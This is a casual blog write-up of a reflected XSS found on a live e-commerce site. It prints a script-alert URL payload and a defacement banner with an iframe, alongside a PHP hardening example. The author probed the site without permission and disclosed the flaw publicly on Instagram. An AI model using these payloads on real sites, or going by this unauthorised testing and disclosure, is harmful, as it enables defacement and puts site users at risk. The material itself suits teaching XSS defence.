Just Another Day, Just Another XSS
Picture this: I was casually sipping my coffee and scrolling through an e-commerce website when I thought, "Let's see if this site has any vulnerabilities." (Because why not?)
I started testing different parameters, injecting payloads, and BOOM, a wild XSS popup appeared!
Recon & Discovery
Like every good hacker, I started with recon. I played around with the site's parameters, URLs, and input fields. After some trial and error, I found something interesting:
https://example.com/product_grid.php?pkey=<script>alert(1)</script>
And guess what? It worked.
Exploitation: Crafting the Payload
Since basic JavaScript injection was working, I took it up a notch and created a cool HTML Injection Payload:
<div style="position:fixed; bottom:20px; left:20px; background:#111;
color:#0f0; padding:15px; font-size:18px; font-family:monospace;
border-radius:10px; box-shadow:0px 0px 10px lime; text-align:center;">
<b>Hackerman Detected!</b><br>
Kick off your noob developer, hire a real security researcher! <br>
<a href="https://www.linkedin.com/in/YOUR_USERNAME"
target="_blank"
style="color:aqua; text-decoration:none; font-weight:bold;">
Contact Me Here
</a>
</div>
<iframe src="https://aiwolfie.vercel.app"
width="300" height="200"
style="border:2px solid lime; display:block; margin-top:10px;">
</iframe>
And just like that, the website was flexing my hacker banner like a pro.
The Impact: Why This Is Serious
This XSS vulnerability allows attackers to:
- Steal user cookies
- Deface the website
- Redirect users to malicious pages
In short, not fixing this could mean disaster for users and the website itself.
Reporting the Bug: No Security.txt, No Contact Info
Following ethical hacking principles, I wanted to report this issue. But guess what? The website had no security.txt file, no bug bounty program, and no clear way to contact the owner.
So, I did what any frustrated security researcher would do: posted the bug on my Instagram story and even mentioned the website's page.
Sadly, no response till now.
Conclusion: Secure Your Website, Folks!
This was a fun bug to find, but it highlights a serious security flaw. Developers, sanitize your inputs, use CSP policies, and always validate user input to prevent XSS.
Stay safe, keep hacking (ethically), and always secure your coffee!
- AIwolfie
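One way to apply the three fixes named in the conclusion (input validation, output encoding, CSP) to a `pkey`-style query parameter. This is an added example, not code from the original post or the affected site; the function names, the allowed `pkey` format and the page markup are assumptions.

```php
<?php
// Added example: hypothetical reconstruction of how product_grid.php might
// handle pkey. The real server code is not shown in the post.
declare(strict_types=1);

// Vulnerable pattern (assumed): the raw parameter is reflected into HTML.
function render_vulnerable(string $pkey): string
{
    return '<h2>Results for ' . $pkey . '</h2>';
}

// Validation: assume pkey is a short key of letters, digits, '-' and '_'.
function validate_pkey(string $pkey): ?string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $pkey) === 1 ? $pkey : null;
}

// Output encoding for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(string $pkey): string
{
    $valid = validate_pkey($pkey);
    if ($valid === null) {
        return '<h2>Invalid product key</h2>';
    }
    // Encode even validated input so the sink stays safe if the rule is loosened.
    return '<h2>Results for ' . h($valid) . '</h2>';
}

// Defence in depth: CSP that blocks inline scripts and framed content.
function send_security_headers(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; "
         . "frame-src 'none'; object-src 'none'; base-uri 'none'");
    header('X-Content-Type-Options: nosniff');
}

if (PHP_SAPI !== 'cli') {
    send_security_headers();
    $pkey = $_GET['pkey'] ?? '';
    echo render_hardened(is_string($pkey) ? $pkey : '');
} else {
    // Constructed sample inputs for a command-line check.
    foreach (['SKU-1042', '<script>alert(1)</script>'] as $sample) {
        echo h($sample), ' => ', render_hardened($sample), PHP_EOL;
    }
}
```

The CSP stops the inline script and the iframe, but an injected banner `<div>` is plain markup and would still render, so the output encoding in `h()` is the fix that actually closes the hole.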